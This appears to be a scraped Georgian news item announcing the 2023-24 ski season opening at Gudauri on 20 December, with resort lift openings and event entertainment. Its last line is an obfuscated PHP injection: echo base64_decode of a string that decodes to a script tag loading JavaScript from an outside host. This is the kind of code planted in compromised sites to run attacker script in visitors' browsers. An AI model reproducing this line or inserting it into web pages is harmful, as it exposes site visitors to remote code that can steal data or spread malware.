celsiusi
ავერსი შნაიდერი

 2023-2024 წლის ზამთრის სეზონი 20 დეკემბერს საზეიმოდ გუდაურში გაიხსნება - ინფორმაციას მთის ტრასების სააგენტო ავრცელებს.

მათი ცნობით, საქართველოს 4-ვე სამთო-სათხილამურო კურორტზე: გუდაურში, ბაკურიანში, გოდერძიზე და მესტიაში, დამსვენებლები, 9 დეკემბრიდან, ეტაპობრივად შეძლებენ საბაგიროებითა და სასრიალო ტრასებით სარგებლობას.

2023-24 წლის ზამთრის სათხილამურო სეზონზე, გუდაურში, დამსვენებლებს 2 ახალი საბაგირო კომპლექსი და ახალი სასრიალო ტრასა დახვდებათ.

ზამთრის ტურისტული სეზონის გახსნის ღონისძიებაზე, ახალი გუდაურის ტერიტორიაზე 20 დეკემბერს 12-დან 18 საათამდე მისულ სტუმრებს გასართობი აქტივობები, საბავშვო ზონები, ფოტო ზონები, კვების ჯიხურები, ბარის კუთხე და მუსიკალური სივრცე დახვდებათ. დღის განმავლობაში ღონისძიებას მუსიკალურად DJ Jino Dolini, DJ Vas და Circus Mircus გააფორმებენ.

347
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");